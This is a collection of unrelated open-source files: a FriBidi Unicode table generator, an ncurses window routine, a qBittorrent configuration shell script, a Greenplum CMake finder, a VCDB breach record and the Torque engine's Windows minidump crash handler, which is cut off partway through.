# include <stddef.h>
#else
# if HAVE_STDLIB_H
# include <stdlib.h>
# endif
#endif
#ifdef HAVE_STRING_H
# if !STDC_HEADERS && HAVE_MEMORY_H
# include <memory.h>
# endif
# include <string.h>
#endif
#ifdef HAVE_STRINGS_H
# include <strings.h>
#endif
#include "packtab.h"
#define appname "gen-joining-type-tab"
#define outputname "joining-type.tab.i"
static void
die (
const char *msg
)
{
fprintf (stderr, appname ": %s\n", msg);
exit (1);
}
static void
die2 (
const char *fmt,
const char *p
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, p);
fprintf (stderr, "\n");
exit (1);
}
static void
die3 (
const char *fmt,
const char *p,
const char *q
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, p, q);
fprintf (stderr, "\n");
exit (1);
}
static void
die3l (
const char *fmt,
unsigned long l,
const char *p
)
{
fprintf (stderr, appname ": ");
fprintf (stderr, fmt, l, p);
fprintf (stderr, "\n");
exit (1);
}
/* Linear enumeration of the FriBidi joining types.  The members are produced
   by x-macro expansion of fribidi-joining-types-list.h; NUM_TYPES ends up as
   the count of listed types. */
enum FriBidiJoiningLinearEnumOffsetOne
{
# define _FRIBIDI_ADD_TYPE(TYPE,SYMBOL) TYPE,
# include <fribidi-joining-types-list.h>
# undef _FRIBIDI_ADD_TYPE
  NUM_TYPES
};
/* Table mapping each joining-type name (as it appears in ArabicShaping.txt)
   to its enum key, generated from the same x-macro list. */
struct
{
  const char *name;
  int key;
}
type_names[] =
{
# define _FRIBIDI_ADD_TYPE(TYPE,SYMBOL) {STRINGIZE(TYPE), TYPE},
# include <fribidi-joining-types-list.h>
# undef _FRIBIDI_ADD_TYPE
};
#define type_names_count (sizeof (type_names) / sizeof (type_names[0]))
/* Reverse lookup: names[key] -> type name; filled in by init(). */
static const char *names[type_names_count];
/* Translate a joining-type name (e.g. "R", "T") into its enum key by linear
   search of type_names.  Aborts the program via die2() on an unknown name,
   so the trailing "return -1" is unreachable and only silences compilers.
   NOTE(review): the return type is char while the keys are ints; the enum
   values here are small, so this presumably never truncates — confirm. */
static char
get_type (
  const char *s
)
{
  unsigned int i;
  for (i = 0; i < type_names_count; i++)
    if (!strcmp (s, type_names[i].name))
      return type_names[i].key;
  die2 ("joining type name `%s' not found", s);
  return -1;
}
/* Bidi types whose characters are skipped for joining purposes: boundary
   neutrals and the explicit directional formatting characters.  These get
   joining type G ("ignored") in the generated table. */
static const char *ignored_bidi_types[] = {
  "BN",
  "LRE",
  "RLE",
  "LRO",
  "RLO",
  "PDF",
  "LRI",
  "RLI",
  "FSI",
  "PDI",
  NULL
};
/* General categories whose characters receive joining type T (transparent).
   Per the derivation notes in Unicode's ArabicShaping.txt, characters not
   explicitly listed there are transparent if their general category is
   Mn (non-spacing mark), Me (enclosing mark) or Cf (format).
   BUGFIX: the list previously contained "Mn" twice and omitted "Me", so
   enclosing marks were never marked transparent. */
static const char *transparent_general_categories[] = {
  "Mn",
  "Me",
  "Cf",
  NULL
};
/* Return the entry of the NULL-terminated 'type_list' that compares equal
   to 's', or NULL when 's' does not occur in the list. */
static const char *
type_is (
  const char *s,
  const char *type_list[]
)
{
  int i;
  for (i = 0; type_list[i] != NULL; i++)
    if (strcmp (s, type_list[i]) == 0)
      return type_list[i];
  return NULL;
}
/* Names emitted into the generated packed-table source. */
#define table_name "Joi"
#define macro_name "FRIBIDI_GET_JOINING_TYPE"
/* One joining-type entry per Unicode code point; filled by the readers
   below and packed by gen_joining_type_tab(). */
static signed int table[FRIBIDI_UNICODE_CHARS];
/* Shared line buffer for the data-file readers, plus scratch fields for the
   parsed joining type, general category and bidi type tokens. */
static char buf[4000];
static char tp[sizeof (buf)], tp_gen[sizeof (buf)], tp_bidi[sizeof (buf)];
/* Reset every code point's joining type to U (the non-joining default). */
static void
clear_tab (
  void
)
{
  register FriBidiChar c;
  for (c = 0; c < FRIBIDI_UNICODE_CHARS; c++)
    table[c] = U;
}
/* Build the key -> name reverse lookup and clear the joining-type table.
   The second loop iterates backwards so that, if two entries share a key,
   the one listed FIRST in type_names wins. */
static void
init (
  void
)
{
  register int i;
  for (i = 0; i < type_names_count; i++)
    names[i] = 0;
  for (i = type_names_count - 1; i >= 0; i--)
    names[type_names[i].key] = type_names[i].name;
  clear_tab ();
}
/* Scan UnicodeData.txt and pre-seed the table: characters with an ignored
   bidi type get joining type G, and characters in a transparent general
   category get joining type T.  ArabicShaping.txt (read afterwards) then
   overrides entries it lists explicitly.
   Each line is parsed as "code;name;general-category;...;bidi-type;...";
   blank lines and lines starting with '#' are skipped. */
static void
read_unicode_data_txt (
  FILE *f
)
{
  unsigned long c, l;
  l = 0;
  while (fgets (buf, sizeof buf, f))
    {
      int i;
      const char *s = buf;
      l++;
      while (*s == ' ')
        s++;
      if (*s == '#' || *s == '\0' || *s == '\n')
        continue;
      /* %lx = code point; skipped field = name; tp_gen = general category;
         skipped field; tp_bidi = bidi category. */
      i = sscanf (s, "%lx;%*[^;];%[^; ];%*[^;];%[^; ]", &c, tp_gen, tp_bidi);
      if (i != 3 || c >= FRIBIDI_UNICODE_CHARS)
        die3l ("UnicodeData.txt: invalid input at line %ld: %s", l, s);
      if (type_is (tp_bidi, ignored_bidi_types))
        table[c] = G;
      if (type_is (tp_gen, transparent_general_categories))
        table[c] = T;
    }
}
/* Scan ArabicShaping.txt and record the explicit joining type for each
   listed code point.  Accepts both single-code lines ("XXXX ; name ; T ...")
   and range lines ("XXXX..YYYY ; name ; T ..."); for the range form the
   second sscanf's result is decremented so that both forms yield i == 2 on
   success.  Overrides whatever read_unicode_data_txt() seeded. */
static void
read_arabic_shaping_txt (
  FILE *f
)
{
  unsigned long c, c2, l;
  l = 0;
  while (fgets (buf, sizeof buf, f))
    {
      int i;
      register char typ;
      const char *s = buf;
      l++;
      while (*s == ' ')
        s++;
      if (*s == '#' || *s == '\0' || *s == '\n')
        continue;
      i = sscanf (s, "%lx ; %*[^;]; %[^; ]", &c, tp);
      if (i == 2)
        c2 = c;
      else
        i = sscanf (s, "%lx..%lx ; %*[^;]; %[^; ]", &c, &c2, tp) - 1;
      if (i != 2 || c > c2 || c2 >= FRIBIDI_UNICODE_CHARS)
        die3l ("ArabicShaping.txt: invalid input at line %ld: %s", l, s);
      typ = get_type (tp);
      for (; c <= c2; c++)
        table[c] = typ;
    }
}
/* Open each named data file and dispatch to the matching reader based on
   the parallel data_file_type[] array.  Both arrays are NULL-terminated;
   any open failure or unrecognized type aborts via die2(). */
static void
read_data (
  const char *data_file_type[],
  const char *data_file_name[]
)
{
  FILE *f;
  for (; data_file_name[0] && data_file_type[0];
       data_file_name++, data_file_type++)
    {
      if (!(f = fopen (data_file_name[0], "rt")))
        die2 ("error: cannot open `%s' for reading", data_file_name[0]);
      if (!strcmp (data_file_type[0], "UnicodeData.txt"))
        read_unicode_data_txt (f);
      else if (!strcmp (data_file_type[0], "ArabicShaping.txt"))
        read_arabic_shaping_txt (f);
      else
        die2 ("error: unknown data-file type %s", data_file_type[0]);
      fclose (f);
    }
}
/* Emit the generated joining-type.tab.i source to stdout: a header comment,
   the PACKTAB_* type defines, the packed lookup table produced by
   pack_table() (from packtab.h), and the matching #undefs.  max_depth
   bounds the multi-level table depth pack_table may use. */
static void
gen_joining_type_tab (
  int max_depth,
  const char *data_file_type[]
)
{
  printf ("/* " outputname "\n * generated by " appname " (" FRIBIDI_NAME " "
          FRIBIDI_VERSION ")\n" " * from the files %s, %s of Unicode version "
          FRIBIDI_UNICODE_VERSION ". */\n\n", data_file_type[0],
          data_file_type[1]);
  printf ("#define PACKTAB_UINT8 uint8_t\n"
          "#define PACKTAB_UINT16 uint16_t\n"
          "#define PACKTAB_UINT32 uint32_t\n\n");
  /* U is the default/fallback value; pack_table returns 0 on failure. */
  if (!pack_table
      (table, FRIBIDI_UNICODE_CHARS, 1, U, max_depth, 1, names,
       "unsigned char", table_name, macro_name, stdout))
    die ("error: insufficient memory, decrease max_depth");
  printf ("#undef PACKTAB_UINT8\n"
          "#undef PACKTAB_UINT16\n" "#undef PACKTAB_UINT32\n\n");
  printf ("/* End of generated " outputname " */\n");
}
/* Usage: gen-joining-type-tab max-depth <UnicodeData.txt> <ArabicShaping.txt>
   Parses the two Unicode data files, builds the per-code-point joining-type
   table, and writes the packed table source to stdout. */
int
main (
  int argc,
  const char **argv
)
{
  const char *data_file_type[] =
    { "UnicodeData.txt", "ArabicShaping.txt", NULL };
  if (argc < 4)
    die3 ("usage:\n " appname " max-depth /path/to/%s /path/to/%s [junk...]",
          data_file_type[0], data_file_type[1]);
  {
    int max_depth = atoi (argv[1]);
    const char *data_file_name[] = { NULL, NULL, NULL };
    data_file_name[0] = argv[2];
    data_file_name[1] = argv[3];
    if (max_depth < 2)
      die ("invalid depth");
    init ();
    read_data (data_file_type, data_file_name);
    gen_joining_type_tab (max_depth, data_file_type);
  }
  return 0;
}
| {
"pile_set_name": "Github"
} |
/****************************************************************************
* Copyright (c) 1998-2009,2010 Free Software Foundation, Inc. *
* *
* Permission is hereby granted, free of charge, to any person obtaining a *
* copy of this software and associated documentation files (the *
* "Software"), to deal in the Software without restriction, including *
* without limitation the rights to use, copy, modify, merge, publish, *
* distribute, distribute with modifications, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included *
* in all copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS *
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF *
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. *
* IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, *
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR *
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR *
* THE USE OR OTHER DEALINGS IN THE SOFTWARE. *
* *
* Except as contained in this notice, the name(s) of the above copyright *
* holders shall not be used in advertising or otherwise to promote the *
* sale, use or other dealings in this Software without prior written *
* authorization. *
****************************************************************************/
/****************************************************************************
* Author: Zeyd M. Ben-Halim <[email protected]> 1992,1995 *
* and: Eric S. Raymond <[email protected]> *
* and: Thomas E. Dickey 1996-on *
* and: Juergen Pfeifer *
****************************************************************************/
/*
** lib_mvwin.c
**
** The routine mvwin().
**
*/
#include <curses.priv.h>
MODULE_ID("$Id: lib_mvwin.c,v 1.18 2010/12/19 01:22:58 tom Exp $")
/* Move a window so its upper-left corner is at screen position (by, bx).
   Pads cannot be moved; out-of-screen positions are rejected.  Only the
   window's origin indices are updated — the window is then touched so the
   next wrefresh() repaints it at the new location.  Returns OK or ERR. */
NCURSES_EXPORT(int)
mvwin(WINDOW *win, int by, int bx)
{
#if NCURSES_SP_FUNCS
    SCREEN *sp = _nc_screen_of(win);
#endif
    T((T_CALLED("mvwin(%p,%d,%d)"), (void *) win, by, bx));
    if (!win || (win->_flags & _ISPAD))
	returnCode(ERR);
    /*
     * mvwin() should only modify the indices. See test/demo_menus.c and
     * test/movewindow.c for examples.
     */
#if 0
    /* Copying subwindows is allowed, but it is expensive... */
    if (win->_flags & _SUBWIN) {
	int err = ERR;
	WINDOW *parent = win->_parent;
	if (parent) {	/* Now comes the complicated and costly part, you should really
			 * try to avoid to move subwindows. Because a subwindow shares
			 * the text buffers with its parent, one can't do a simple
			 * memmove of the text buffers. One has to create a copy, then
			 * to relocate the subwindow and then to do a copy.
			 */
	    if ((by - parent->_begy == win->_pary) &&
		(bx - parent->_begx == win->_parx))
		err = OK;	/* we don't actually move */
	    else {
		WINDOW *clone = dupwin(win);
		if (clone) {
		    /* now we have the clone, so relocate win */
		    werase(win);	/* Erase the original place */
		    /* fill with parents background */
		    wbkgrnd(win, CHREF(parent->_nc_bkgd));
		    wsyncup(win);	/* Tell the parent(s) */
		    err = mvderwin(win,
				   by - parent->_begy,
				   bx - parent->_begx);
		    if (err != ERR) {
			err = copywin(clone, win,
				      0, 0, 0, 0, win->_maxy, win->_maxx, 0);
			if (ERR != err)
			    wsyncup(win);
		    }
		    if (ERR == delwin(clone))
			err = ERR;
		}
	    }
	}
	returnCode(err);
    }
#endif
    /* Reject positions where any part of the window would fall off-screen. */
    if (by + win->_maxy > screen_lines(SP_PARM) - 1
	|| bx + win->_maxx > screen_columns(SP_PARM) - 1
	|| by < 0
	|| bx < 0)
	returnCode(ERR);
    /*
     * Whether or not the window is moved, touch the window's contents so
     * that a following call to 'wrefresh()' will paint the window at the
     * new location. This ensures that if the caller has refreshed another
     * window at the same location, that this one will be displayed.
     */
    win->_begy = (NCURSES_SIZE_T) by;
    win->_begx = (NCURSES_SIZE_T) bx;
    returnCode(touchwin(win));
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Script Name: AtoMiC qBittorrent settings configurator
# Patches a qBittorrent settings file by substituting the UNAME and Locale
# placeholders.  Expects the calling AtoMiC toolkit scripts to have exported
# UNAME, APPSETTINGS and the color variables (YELLOW, RED, ENDCOLOR).
echo
echo -e "$YELLOW--->Configuring qBittorrent Settings...$ENDCOLOR"
#Set username
sudo sed -i "s@UNAME@$UNAME@g" $APPSETTINGS || \
{ echo -e "${RED}Modifying UNAME in $APPSETTINGS file failed.$ENDCOLOR"; exit 1; }
# Take the first five characters of $LANG as the locale code (e.g. "en_US").
# NOTE(review): assumes LANG is set and shaped like "en_US.UTF-8"; if LANG is
# empty, LOCALE ends up empty and an empty Locale= is written — confirm.
LOCALE=${LANG:0:5}
echo 'Locale found:' $LOCALE
#Set Locale
sudo sed -i "s@Locale=@Locale=$LOCALE@g" $APPSETTINGS || \
{ echo -e "${RED}Modifying LOCALE in $APPSETTINGS file failed.$ENDCOLOR"; exit 1; }
"pile_set_name": "Github"
} |
# Wrapper around FindPostgreSQL.cmake that locates a Greenplum Database
# installation (Greenplum is PostgreSQL-derived, so the same probing logic
# applies with Greenplum-specific version macros and search paths).
# Set defaults that can be overridden by files that include this file:
if(NOT DEFINED _FIND_PACKAGE_FILE)
    set(_FIND_PACKAGE_FILE "${CMAKE_CURRENT_LIST_FILE}")
endif(NOT DEFINED _FIND_PACKAGE_FILE)
# Set parameters for calling FindPostgreSQL.cmake
set(_NEEDED_PG_CONFIG_PACKAGE_NAME "Greenplum Database")
set(_PG_CONFIG_VERSION_NUM_MACRO "GP_VERSION_NUM")
set(_PG_CONFIG_VERSION_MACRO "GP_VERSION")
set(_SEARCH_PATH_HINTS
    "/usr/local/greenplum-db/bin"
    "$ENV{GPHOME}/bin"
)
include("${CMAKE_CURRENT_LIST_DIR}/../../postgres/cmake/FindPostgreSQL.cmake")
if(${PKG_NAME}_FOUND)
    # server/funcapi.h ultimately includes server/access/xact.h, from which
    # cdb/cdbpathlocus.h is included
    execute_process(COMMAND ${${PKG_NAME}_PG_CONFIG} --pkgincludedir
        OUTPUT_VARIABLE ${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS
        OUTPUT_STRIP_TRAILING_WHITESPACE
    )
    # The Greenplum-internal headers live under <pkgincludedir>/internal.
    set(${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS
        "${${PKG_NAME}_ADDITIONAL_INCLUDE_DIRS}/internal")
endif(${PKG_NAME}_FOUND)
| {
"pile_set_name": "Github"
} |
{
"action": {
"physical": {
"variety": [
"Theft",
"Bypassed controls"
],
"vector": [
"Unknown"
]
}
},
"actor": {
"external": {
"country": [
"Unknown"
],
"motive": [
"Financial"
],
"region": [
"000000"
],
"variety": [
"Unknown"
]
}
},
"asset": {
"assets": [
{
"variety": "Unknown"
}
],
"cloud": [
"Unknown"
]
},
"attribute": {
"availability": {
"variety": [
"Loss"
]
},
"confidentiality": {
"data": [
{
"variety": "Unknown"
}
],
"data_disclosure": "Yes",
"data_total": 13
}
},
"discovery_method": {
"unknown": true
},
"incident_id": "06B76E45-468B-4B6A-B1A8-6C11AF3BD562",
"plus": {
"analysis_status": "First pass",
"analyst": "swidup",
"created": "2014-11-24T16:59:31Z",
"master_id": "06B76E45-468B-4B6A-B1A8-6C11AF3BD562",
"modified": "2014-11-24T16:59:31Z"
},
"reference": "http://vcdb.org/pdf/va-security.pdf",
"schema_version": "1.3.4",
"security_incident": "Confirmed",
"source_id": "vcdb",
"summary": "A VA provider had his appointment book stolen on 02/27/13. It contained the first and last initials and last 4 digits of the SSNs for 13 Veterans and the date, time, and abbreviation for the clinic location the provider met with them. There was no other protected health information (PHI) or additional notes recorded in the book. The employee reported the incident to his supervisor and the facility Privacy Officer (PO). VA Police have been notified as well, but a report number has not been provided.",
"timeline": {
"incident": {
"day": 27,
"month": 2,
"year": 2013
}
},
"victim": {
"country": [
"US"
],
"employee_count": "Over 100000",
"industry": "923140",
"region": [
"019021"
],
"state": "OR",
"victim_id": "United States Department of Veterans Affairs"
}
} | {
"pile_set_name": "Github"
} |
//-----------------------------------------------------------------------------
// Copyright (c) 2012 GarageGames, LLC
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
//-----------------------------------------------------------------------------
#if defined( TORQUE_MINIDUMP ) && defined( TORQUE_RELEASE )
#include "platformWin32/platformWin32.h"
#include "platformWin32/minidump/winStackWalker.h"
#include "core/fileio.h"
#include "core/strings/stringFunctions.h"
#include "console/console.h"
#include "app/net/serverQuery.h"
#pragma pack(push,8)
#include <DbgHelp.h>
#include <time.h>
#pragma pack(pop)
#pragma comment(lib, "dbghelp.lib")
extern Win32PlatState winState;
//Forward declarations for the dialog functions
BOOL CALLBACK MiniDumpDialogProc(HWND hwndDlg, UINT message, WPARAM wParam, LPARAM lParam);
LRESULT DisplayMiniDumpDialog(HINSTANCE hinst, HWND hwndOwner);
LPWORD lpwAlign(LPWORD lpIn);
char gUserInput[4096];
//Console variables
extern StringTableEntry gMiniDumpDir;
extern StringTableEntry gMiniDumpUser;
extern StringTableEntry gMiniDumpExec;
extern StringTableEntry gMiniDumpParams;
extern StringTableEntry gMiniDumpExecDir;
// Copy 'src' into 'dst', replacing the FIRST occurrence of 'findStr' (if any)
// with 'replaceStr'.  Returns 'dst'.  The caller must size 'dst' to hold the
// result; occurrences after the first are left untouched.
char* dStrrstr(char* dst, const char* src, const char* findStr, char* replaceStr)
{
   // Locate the first occurrence of the pattern within the source string.
   const char* hit = strstr(src, findStr);
   if (hit == NULL)
   {
      // Pattern absent: dst is a plain copy of src.
      strcpy(dst, src);
      return dst;
   }

   // Prefix before the match, then the replacement, then the remainder
   // that follows the matched pattern.
   size_t prefixLen = (size_t)(hit - src);
   memcpy(dst, src, prefixLen);
   dst[prefixLen] = '\0';
   strcat(dst, replaceStr);
   strcat(dst, hit + strlen(findStr));
   return dst;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// CreateMiniDump()
//
// Unhandled-exception filter body: prompts the user for a description of the
// crash, writes a timestamped crash folder containing Minidump.dmp, the
// console log, the game dll/pdb and a crash.log (user text + stack trace),
// then optionally launches an external reporting tool configured from script
// (gMiniDumpExec / gMiniDumpParams / gMiniDumpExecDir).
// Always returns EXCEPTION_EXECUTE_HANDLER so the process terminates the
// handler path rather than re-faulting — except on createPath failure, where
// 'return false' yields 0 (EXCEPTION_CONTINUE_SEARCH); NOTE(review): confirm
// that fallthrough to the next handler is intended there.
//-----------------------------------------------------------------------------------------------------------------------------------------
INT CreateMiniDump( LPEXCEPTION_POINTERS ExceptionInfo)
{
   //Get any information we can from the user and store it in gUserInput
   try
   {
      // Make sure the cursor is visible before showing the dialog.
      while(ShowCursor(TRUE) < 0);
      DisplayMiniDumpDialog(winState.appInstance, winState.appWindow);
   }
   catch(...)
   {
      //dSprintf(gUserInput, 4096, "The user could not enter a description of what was occurring.\n\n\n");
   }
   //Build a Game, Date and Time stamped MiniDump folder
   time_t theTime;
   time(&theTime);
   tm* pLocalTime = localtime(&theTime);
   char crashFolder[2048];
   dSprintf(crashFolder, 2048, "%s_%02d.%02d_%02d.%02d.%02d",
      Platform::getExecutableName(),
      pLocalTime->tm_mon+1, pLocalTime->tm_mday,
      pLocalTime->tm_hour, pLocalTime->tm_min, pLocalTime->tm_sec);
   //Build the fully qualified MiniDump path (script-configured gMiniDumpDir,
   //or <cwd>/MiniDump when unset)
   char crashPath[2048];
   char fileName[2048];
   if(gMiniDumpDir==NULL)
   {
      dSprintf(crashPath, 2048, "%s/MiniDump/%s", Platform::getCurrentDirectory(), crashFolder);
   }
   else
   {
      dSprintf(crashPath, 2048, "%s/%s", gMiniDumpDir, crashFolder);
   }
   dSprintf(fileName, 2048, "%s/Minidump.dmp",crashPath);
   if (!Platform::createPath (fileName))return false; //create the directory
   //Save the minidump
   File fileObject;
   if(fileObject.open(fileName, File::Write) == File::Ok)
   {
      MINIDUMP_EXCEPTION_INFORMATION DumpExceptionInfo;
      DumpExceptionInfo.ThreadId = GetCurrentThreadId();
      DumpExceptionInfo.ExceptionPointers = ExceptionInfo;
      DumpExceptionInfo.ClientPointers = true;
      MiniDumpWriteDump( GetCurrentProcess(), GetCurrentProcessId(), (HANDLE)fileObject.getHandle(), MiniDumpNormal, &DumpExceptionInfo, NULL, NULL );
      fileObject.close();
   }
   //copy over the log file
   char fromFile[2048];
   dSprintf(fromFile, 2048, "%s/%s", Platform::getCurrentDirectory(), "console.log" );
   dSprintf(fileName, 2048, "%s/console.log", crashPath);
   Con::setLogMode(3); //ensure that the log file is closed (so it can be copied)
   dPathCopy(fromFile, fileName, true);
   //copy over the exe file
   //NOTE(review): stripping 4 characters assumes the executable name ends in
   //a 3-letter extension like ".exe" — confirm for all shipping configs.
   char exeName[1024];
   dSprintf(exeName, 1024, Platform::getExecutableName());
   exeName[dStrlen(exeName)-4]=0;
   dSprintf(fromFile, 2048, "%s/%s.dll", Platform::getCurrentDirectory(), exeName );
   dSprintf(fileName, 2048, "%s/%s.dll", crashPath, exeName );
   dPathCopy(fromFile, fileName, true);
   //copy over the pdb file
   char pdbName[1024];
   dStrcpy(pdbName, exeName, 1024);
   dStrncat(pdbName, ".pdb", 4);
   dSprintf(fromFile, 2048, "%s/%s", Platform::getCurrentDirectory(), pdbName );
   dSprintf(fileName, 2048, "%s/%s", crashPath, pdbName );
   dPathCopy(fromFile, fileName, true);
   //save the call stack
   char traceBuffer[65536];
   traceBuffer[0] = 0;
   dGetStackTrace( traceBuffer, *static_cast<const CONTEXT *>(ExceptionInfo->ContextRecord) );
   //save the user input and the call stack to a file
   char crashlogFile[2048];
   dSprintf(crashlogFile, 2048, "%s/crash.log", crashPath);
   if(fileObject.open(crashlogFile, File::Write) == File::Ok)
   {
      fileObject.write(strlen(gUserInput), gUserInput);
      fileObject.write(strlen(traceBuffer), traceBuffer);
      fileObject.close();
   }
   //call the external program indicated in script
   if(gMiniDumpExec!= NULL)
   {
      //replace special variables in gMiniDumpParams
      //(alternating scratch buffers; dStrrstr replaces one pattern per call)
      if(gMiniDumpParams)
      {
         char updateParams[4096];
         char finalParams[4096];
         dStrrstr(finalParams, gMiniDumpParams, "%crashpath%", crashPath);
         dStrrstr(updateParams, finalParams, "%crashfolder%", crashFolder);
         dStrrstr(finalParams, updateParams, "%crashlog%", crashlogFile);
         ShellExecuteA(NULL, "", gMiniDumpExec, finalParams, gMiniDumpExecDir ? gMiniDumpExecDir : "", SW_SHOWNORMAL);
      }
      else
      {
         ShellExecuteA(NULL, "", gMiniDumpExec, "", gMiniDumpExecDir ? gMiniDumpExecDir : "", SW_SHOWNORMAL);
      }
   }
   return EXCEPTION_EXECUTE_HANDLER;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// MiniDumpDialogProc - Used By DisplayMiniDumpDialog
//
// Dialog procedure for the crash-description dialog.  On ID_DONE it copies
// the edit-control contents into the global gUserInput (appending blank
// lines as a separator before the stack trace) and closes the dialog.
//-----------------------------------------------------------------------------------------------------------------------------------------
// Control identifiers used when building the in-memory dialog template.
const S32 ID_TEXT=200;
const S32 ID_USERTEXT=300;
const S32 ID_DONE=400;
BOOL CALLBACK MiniDumpDialogProc(HWND hwndDlg, UINT message, WPARAM wParam, LPARAM lParam)
{
   char text[128]= "";
   switch (message)
   {
      case WM_INITDIALOG :
         // Start with an empty edit control.
         SetDlgItemTextA ( hwndDlg, ID_USERTEXT, text );
         return TRUE ;
      case WM_COMMAND:
         switch (LOWORD(wParam))
         {
            case ID_DONE:
               // Pull whatever the user typed into the global buffer.
               if( !GetDlgItemTextA(hwndDlg, ID_USERTEXT, gUserInput, 4096) ) gUserInput[0]='\0';
               strcat(gUserInput, "\n\n\n");
               EndDialog(hwndDlg, wParam);
               return TRUE;
            default:
               return TRUE;
         }
   }
   return FALSE;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// Helper function to DWORD align the Dialog Box components (Used in DisplayMiniDumpDialog()
//-----------------------------------------------------------------------------------------------------------------------------------------
LPWORD lpwAlign(LPWORD lpIn)
{
   // In-memory dialog templates require each DLGITEMTEMPLATE to start on a
   // DWORD (4-byte) boundary, so round the pointer UP to the next multiple
   // of four.
   //
   // Fixes two defects in the previous version:
   //  - it cast the pointer through 32-bit ULONG, which truncates addresses
   //    in 64-bit builds (ULONG_PTR is pointer-sized);
   //  - its ++ / >>1 / <<1 sequence only produced WORD (2-byte) alignment,
   //    not the DWORD alignment the callers' comments ask for.
   ULONG_PTR ul = (ULONG_PTR)lpIn;
   ul += 3;
   ul >>= 2;
   ul <<= 2;
   return (LPWORD)ul;
}
//-----------------------------------------------------------------------------------------------------------------------------------------
// Create the Dialog Box to get input from the user
//
// Builds an in-memory dialog template (DLGTEMPLATE followed by three
// DLGITEMTEMPLATE items: a static prompt, a Done button and a multi-line
// edit control) and runs it modally with MiniDumpDialogProc, which stores
// the user's text in gUserInput.  Returns the DialogBoxIndirect result,
// or -1 if the template buffer could not be allocated.
//-----------------------------------------------------------------------------------------------------------------------------------------
LRESULT DisplayMiniDumpDialog(HINSTANCE hinst, HWND hwndOwner)
{
   HGLOBAL hgbl = GlobalAlloc(GMEM_ZEROINIT, 1024);
   if (!hgbl) return -1;

   //-----------------------------------------------------------------
   // Define the dialog box
   //-----------------------------------------------------------------
   LPDLGTEMPLATE lpdt = (LPDLGTEMPLATE)GlobalLock(hgbl);
   lpdt->style = WS_POPUP | WS_BORDER | DS_MODALFRAME | WS_CAPTION;
   lpdt->cdit = 3; // Number of controls
   lpdt->x = 100;
   lpdt->y = 100;
   lpdt->cx = 300;
   lpdt->cy = 90;
   // The menu, class and title arrays immediately follow the DLGTEMPLATE.
   LPWORD lpw = (LPWORD)(lpdt + 1);
   *lpw++ = 0; // No menu
   *lpw++ = 0; // Predefined dialog box class (by default)
   LPWSTR lpwsz = (LPWSTR)lpw;
   S32 nchar = 1 + MultiByteToWideChar(CP_ACP, 0, "MiniDump Crash Report", -1, lpwsz, 50);
   lpw += nchar;
   //-----------------------------------------------------------------
   // Define a static text message
   //-----------------------------------------------------------------
   lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
   LPDLGITEMTEMPLATE lpdit = (LPDLGITEMTEMPLATE)lpw;
   lpdit->x = 10;
   lpdit->y = 10;
   lpdit->cx = 290;
   lpdit->cy = 10;
   lpdit->id = ID_TEXT; // Text identifier
   lpdit->style = WS_CHILD | WS_VISIBLE | SS_LEFT;
   lpw = (LPWORD)(lpdit + 1);
   *lpw++ = 0xFFFF;     // Marker: next WORD is a predefined class atom
   *lpw++ = 0x0082;     // Static class
   LPSTR msg = "The program has crashed. Please describe what was happening:";
   // Widen the ANSI message in place into the template's title array.
   for (lpwsz = (LPWSTR)lpw; *lpwsz++ = (WCHAR)*msg++;);
   lpw = (LPWORD)lpwsz;
   *lpw++ = 0; // No creation data
   //-----------------------------------------------------------------
   // Define a DONE button
   //-----------------------------------------------------------------
   lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
   lpdit = (LPDLGITEMTEMPLATE)lpw;
   lpdit->x = 265;
   lpdit->y = 75;
   lpdit->cx = 25;
   lpdit->cy = 12;
   lpdit->id = ID_DONE; // OK button identifier
   lpdit->style = WS_CHILD | WS_VISIBLE | WS_TABSTOP;// | BS_DEFPUSHBUTTON;
   lpw = (LPWORD)(lpdit + 1);
   *lpw++ = 0xFFFF;
   *lpw++ = 0x0080; // Button class
   lpwsz = (LPWSTR)lpw;
   nchar = 1 + MultiByteToWideChar(CP_ACP, 0, "Done", -1, lpwsz, 50);
   lpw += nchar;
   *lpw++ = 0; // No creation data
   //-----------------------------------------------------------------
   // Define a text entry message
   //-----------------------------------------------------------------
   lpw = lpwAlign(lpw); // Align DLGITEMTEMPLATE on DWORD boundary
   lpdit = (LPDLGITEMTEMPLATE)lpw;
   lpdit->x = 10;
   lpdit->y = 22;
   lpdit->cx = 280;
